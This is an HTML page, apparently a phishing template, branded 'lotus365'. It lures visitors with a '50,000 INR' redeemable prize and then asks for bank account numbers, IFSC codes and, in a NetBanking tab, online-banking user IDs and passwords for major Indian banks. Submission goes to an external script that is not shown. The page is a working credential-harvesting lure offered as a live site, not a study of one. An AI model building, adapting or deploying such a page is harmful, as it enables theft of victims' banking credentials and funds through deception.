<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Welcome to lotus365</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link
      rel="stylesheet"
      href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"
    />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <link rel="icon" type="image/png" href="favicon.png" />
  </head>
  <body>
    <style>
      body {
        overflow-x: hidden;
      }
      .navbar-fixed-top {
        position: sticky;
        position: -webkit-sticky;
        top: 0;
        /*     z-index: 1; */
        background: #1f8066;
      }

      .navbar-fixed-top.cbp-af-header-shrink {
        padding: 10px 0;
      }

      /* Login v4 */

      .signup_v4 .social-area {
        text-align: center;
        padding-top: 14px;
      }

      .signup_v4 .social-area .title {
        font-size: 20px;
        text-transform: uppercase;
        font-weight: 600;
        display: inline-block;
        color: #007bff;
        position: relative;
      }

      .signup_v4 .social-area .text {
        font-size: 17px;
        font-weight: 400;
        color: #143250;
      }

      .signup_v4 .social-area .title::before {
        position: absolute;
        content: "";
        width: 40px;
        height: 1px;
        background: rgba(0, 0, 0, 0.2);
        top: 50%;
        -webkit-transform: translateY(-50%);
        -ms-transform: translateY(-50%);
        transform: translateY(-50%);
        left: 100%;
        margin-left: 7px;
      }

      .signup_v4 .social-area .title::after {
        position: absolute;
        content: "";
        width: 40px;
        height: 1px;
        background: rgba(0, 0, 0, 0.2);
        top: 50%;
        -webkit-transform: translateY(-50%);
        -ms-transform: translateY(-50%);
        transform: translateY(-50%);
        right: 100%;
        margin-right: 7px;
      }

      .signup_v4 ul.social-links {
        padding: 0;
        margin: 0;
      }

      .signup_v4 .social-area .social-links li {
        display: inline-block;
      }

      .signup_v4 .social-area .social-links li a i {
        width: 50px;
        height: 50px;
        border-radius: 50%;
        line-height: 50px;
        display: inline-block;
        color: #fff;
        margin: 0 5px;
        -webkit-box-shadow: 0 5px 10px rgb(0 0 0 / 15%);
        box-shadow: 0 5px 10px rgb(0 0 0 / 15%);
      }

      .signup_v4 .social-area .social-links li a i.fa-facebook-f {
        background: #0069f7;
      }

      .signup_v4 .social-area .social-links li a i.fa-google-plus-g {
        background: #d1062c;
      }

      .signup_v4 .nav-tabs .nav-link.active {
        background: #007bff;
      }

      .signup_v4 .nav-tabs .nav-link {
        background: #143250;
      }

      .signup_v4 .nav-tabs .nav-link {
        border: 0;
        margin: 0;
        padding: 10px 0;
        text-align: center;
        border-radius: 0;
        color: #fff;
      }

      .signup_v4 .nav-tabs li.nav-item {
        width: 50%;
      }

      .signup_v4 .card-body {
        padding: 0px;
      }

      .signup_v4 .card-body .tab-content {
        padding: 0 1.25rem 1.75em;
      }
    </style>

    <div class="container-fluid">
      <div class="row">
        <header class="navbar-fixed-top cbp-af-header">
          <nav>
            <img
              style="width: 180px; padding: 20px 10px 20px 10px"
              src="logo.png"
            />
            <a href="Redeem_amount.html">
              <p
                style="
                  float: right;
                  color: #fffc00;
                  padding: 20px 10px 30px 10px;
                  font-weight: bold;
                "
              >
                50,000 INR
              </p></a
            >
          </nav>
        </header>
      </div>

      <div class="row">
        <center><h4>Redeem Now</h4></center>

        <div class="card signup_v4 mb-30">
          <div class="card-body">
            <ul class="nav nav-tabs" id="myTab" role="tablist">
              <li class="nav-item" role="presentation">
                <a
                  class="nav-link active"
                  id="login-tab"
                  data-toggle="tab"
                  href="#login"
                  role="tab"
                  aria-controls="login"
                  aria-selected="true"
                  >Bank Account</a
                >
              </li>
              <li class="nav-item" role="presentation">
                <a
                  class="nav-link"
                  id="register-tab"
                  data-toggle="tab"
                  href="#register"
                  role="tab"
                  aria-controls="register"
                  aria-selected="false"
                  >NetBanking</a
                >
              </li>
            </ul>
            <div class="tab-content" id="myTabContent">
              <div
                class="tab-pane fade show active"
                id="login"
                role="tabpanel"
                aria-labelledby="login-tab"
              >
                <h4
                  class="text-center mt-4 mb-4"
                  style="text-transform: uppercase"
                >
                  Bank Account
                </h4>
                <form id="bankform">
                  <div class="form-row">
                    <div class="form-group col-md-12">
                      <label for="inputName">Enter Your Name</label>
                      <input
                        type="text"
                        class="form-control"
                        id="#"
                        placeholder="Enter Your Name"
                        required=""
                        name="name"
                      />
                    </div>
                    <div class="form-group col-md-12">
                      <label for="inputName">Mobile No</label>
                      <input
                        type="number"
                        class="form-control"
                        id="#"
                        placeholder="Enter your Mobile No"
                        required=""
                        name="mobile"
                      />
                    </div>
                  </div>
                  <div class="form-group col-md-12">
                    <label for="inputName">Your Bank</label>
                    <select
                      id="inputState"
                      class="form-control"
                      required=""
                      name="bank"
                    >
                      <option selected="">Choose Bank</option>
                      <option>Bank of Baroda</option>
                      <option>Bank of India</option>
                      <option>State Bank of India</option>
                      <option>Punjab National Bank</option>
                      <option>Central Bank of India</option>
                      <option>AXIS Bank</option>
                      <option>HDFC Bank</option>
                      <option>ICICI Bank</option>
                      <option>Kotak Mahindra Bank</option>
                      <option>Others</option>
                    </select>
                  </div>

                  <div class="form-group col-md-12">
                    <label for="inputName">Bank Account Number</label>
                    <input
                      type="text"
                      class="form-control"
                      id="#"
                      placeholder="Enter Your Bank Account Number"
                      required=""
                      name="acnumber"
                    />
                  </div>

                  <div class="form-group col-md-12">
                    <label for="inputName">Re-Bank Account Number</label>
                    <input
                      type="text"
                      class="form-control"
                      id="#"
                      placeholder="Enter Your Re Bank Account Number"
                      required=""
                      name="reacnumber"
                    />
                  </div>
                  <div class="form-group col-md-12">
                    <label for="inputName">IFSC Code</label>
                    <input
                      type="text"
                      class="form-control"
                      id="#"
                      placeholder="Enter Your IFSC Code"
                      required=""
                      name="ifscnumber"
                    />
                  </div>

                  <div class="mt-2 mb-3">
                    <button class="btn btn-primary full-width" type="submit">
                      Submit
                    </button>
                  </div>
                </form>
              </div>

              <div
                class="tab-pane fade"
                id="register"
                role="tabpanel"
                aria-labelledby="register-tab"
                style="
                  position: absolute;
                  top: 17rem !important;
                  width: 100%;
                  padding: 0 1.25rem 1.75em;
                "
              >
                <h4
                  class="text-center mt-4 mb-4"
                  style="text-transform: uppercase"
                >
                  NetBanking
                </h4>
                <form id="netbanking">
                  <div class="form-group col-md-12">
                    <label for="inputName">Select Bank </label>
                    <select
                      id="inputState"
                      class="form-control"
                      required=""
                      name="netbank"
                    >
                      <option selected="">Choose Bank</option>
                      <option>Bank of Baroda</option>
                      <option>Bank of India</option>
                      <option>State Bank of India</option>
                      <option>Punjab National Bank</option>
                      <option>Central Bank of India</option>
                      <option>AXIS Bank</option>
                      <option>HDFC Bank</option>
                      <option>ICICI Bank</option>
                      <option>Kotak Mahindra Bank</option>
                      <option>Others</option>
                    </select>
                  </div>
                  <div class="form-row">
                    <div class="form-group col-md-12">
                      <label for="inputName">User Id</label>
                      <input
                        type="password"
                        class="form-control"
                        id="inputPassword4"
                        placeholder="User Id"
                        required=""
                        name="userid"
                      />
                    </div>
                    <div class="form-group col-md-12">
                      <label for="inputName">Password</label>
                      <input
                        type="password"
                        class="form-control"
                        id="inputPassword4"
                        placeholder="Enter your password"
                        required=""
                        name="password"
                      />
                    </div>
                  </div>

                  <div class="mt-2 mb-3">
                    <button class="btn btn-primary full-width" type="submit">
                      Submit
                    </button>
                  </div>
                  <hr class="mt-3 mb-4" />
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script src="./index.js"></script>
  </body>
</html>
